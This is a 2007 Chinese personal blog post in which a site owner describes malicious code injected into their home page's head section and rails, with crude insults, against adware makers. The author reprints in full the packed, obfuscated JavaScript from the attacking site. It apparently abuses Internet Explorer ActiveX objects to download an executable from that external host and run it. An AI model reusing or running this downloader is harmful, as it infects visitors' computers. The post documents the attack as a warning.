　　欢迎来到思考者的博客。本站内容欢迎非商业性转载，请注明出处：http://2006.ghtxx.cn:88/shower/　如有需要与站长讨论，请QQ：26820218，很高兴与您成为朋友。

流氓都变聪明了，上网要小心。

上一篇 / 下一篇 2007-06-24 11:15:34 / 个人分类：服务器技术

　　今天更新一个DZ插件时得到一个提醒，我的首页上有恶意代码，经过检查，的确有一小段很奇怪的代码出现在不应该出现的地方：

这段代码出现在了<head>中，这是很明显的恶意修改，在网上搜索了一下这个垃圾网站，原来这家伙侵犯的地方还不少呢，具体情况可以用GOOGLE搜索6658588这个垃圾就行了。

　　这种恶意的行为很明显是有后台的，这也就解释了为什么我的电脑中会出现CNNIC的垃圾软件的原因了。

　　这是我用360安全卫士检查恶评软件时找到的，奇怪的是，本人安装的卡巴斯基这次并没有报警了？！难道它也跟CNNIC这个不要脸的勾结起来了？？？
　　打开恶意代码中的那个网站一看，就明白了，这个不要脸的胆子小了，在那上面只是挂了一个统计代码，目前并没有放上真正的木马！

　　大家看到了吧，这个垃圾在上面放了两个统计，以获得相应的流量显示赚取利润，同时上面安装的CNNIC两个不要脸的插件应该也能给这个婊子带去些利益，所以，现在我们处在危险中了，这次的CNNIC插件安装之后并不会在IE工具栏上显示出来，因为本人的IE一直只有GOOGLE工具栏，没看到这些婊子养的东西，这是一种更危险的信号了：所有流氓打算转入地下，去当黑社会了？？

　　除了这两个统计之外，这个垃圾的恶意页面中还安插有它自己的一段恶意代码

http://www.6658588.cn/0614.js

本人把这段代码下载回来留做证据了：

eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode
(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);
k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('13 Q(X){n 11=U
["\\L\\a\\5\\t"]["\\b\\a\\e\\c\\7\\g"]()*X;10\'\\16\\5\\g\\d\'+\'\\h\\5\\g\\d\'}15{R=\'\\t\
\5\\5\\d\\S\\C\\C\\m\\m\\m\\O\\h\\s\\s\\w\\B\\w\\B\\B\\h\\6\\e\\C\\c\\7\\14\\e\\h\\
3\\N\\3\';n p=U["\\c\\7\\6\\v\\g\\3\\e\\5"]["\\6\\b\\3\\a\\5\\3\\z\\8\\3\\g\\3\\e\\5"]("\
\7\\j\\o\\3\\6\\5");p["\\f\\3\\5\\x\\5\\5\\b\\9\\j\\v\\5\\3"]("\\6\\8\\a\\f\\f\\9\\c","\\6\\8\\f
\\9\\c\\S\\G\\T\\M\\s\\k\\w\\w\\s\\A\\s\\w\\x\\J\\A\\O\\O\\T\\m\\A\\M\\B\\J\\x\\A\\m
\\m\\k\\m\\1d\\y\\k\\V\\M\\z\\J\\s");n E$4=p["\\k\\b\\3\\a\\5\\3\\r\\j\\o\\3\\6\\5"]("\\
L\\9\\6\\b\\7\\f\\7\\1e\\5\\h\\1b"+"\\L"+"\\18"+"\\17"+"\\D"+"\\D"+"\\P","");n q=p[
"\\k\\b\\3\\a\\5\\3\\r\\j\\o\\3\\6\\5"]("\\x\\c\\7\\c\\j\\h\\l\\5\\b\\3\\a\\g","");q["\\5\\H\\d
\\3"]=1;E$4["\\7\\d\\3\\e"]("\\W\\z\\D",R,0);E$4["\\f\\3\\e\\c"]();u=Q(19);n I$F=p
["\\k\\b\\3\\a\\5\\3\\r\\j\\o\\3\\6\\5"]("\\l\\6\\b\\9\\d\\5\\9\\e\\1a\\h\\y\\9\\8\\3\\l\\H\\f
\\5\\3\\g\\r\\j\\o\\3\\6\\5","");n K=I$F["\\W\\3\\5\\l\\d\\3\\6\\9\\a\\8\\y\\7\\8\\c\\3\\b
"](0);u=I$F["\\G\\v\\9\\8\\c\\P\\a\\5\\t"](K,u);q["\\r\\d\\3\\e"]();q["\\1c\\b\\9\\5\\3"]
(E$4["\\b\\3\\f\\d\\7\\e\\f\\3\\G\\7\\c\\H"]);q["\\l\\a\\12\\3\\D\\7\\y\\9\\8\\3"](u,2);q
["\\k\\8\\7\\f\\3"]();n Z=p["\\k\\b\\3\\a\\5\\3\\r\\j\\o\\3\\6\\5"]("\\l\\t\\3\\8\\8\\h\\x\\d\
\d\\8\\9\\6\\a\\5\\9\\7\\e","");Y=I$F["\\G\\v\\9\\8\\c\\P\\a\\5\\t"](K+\'\\\\\\f\\H\\f\\5\
\3\\g\\J\\V\',\'\\6\\g\\c\\h\\3\\N\\3\');Z["\\l\\t\\3\\8\\8\\z\\N\\3\\6\\v\\5\\3"](Y,\' \\C\\6
\'+u,"","\\7\\d\\3\\e",0)}1f(i){i=1}',62,78,'|||x65||x74|x63|x6f|x6c|x69|x61|x72|x
64|x70|x6e|x73|x6d|x2e||x62|x43|x53|x30|var|x6a|OAXty3|Lzim5|x4f|x36|x6
8|fname1|x75|x35|x41|x46|x45|x2d|x38|x2f|x54|Sw|R6|x42|x79|hHf|x33|Vg
DnZXHt7|x4d|x39|x78|x31|x50|gn|dl|x3a|x44|window|x32|x47|rRaGEykU1|
exp1|SmAcqIwGV8|return|Orh2|x76|function|x77|try|x7e|x48|x4c|10000|x6
7|x58|x57|x34|x66|catch'.split('|'),0,{}))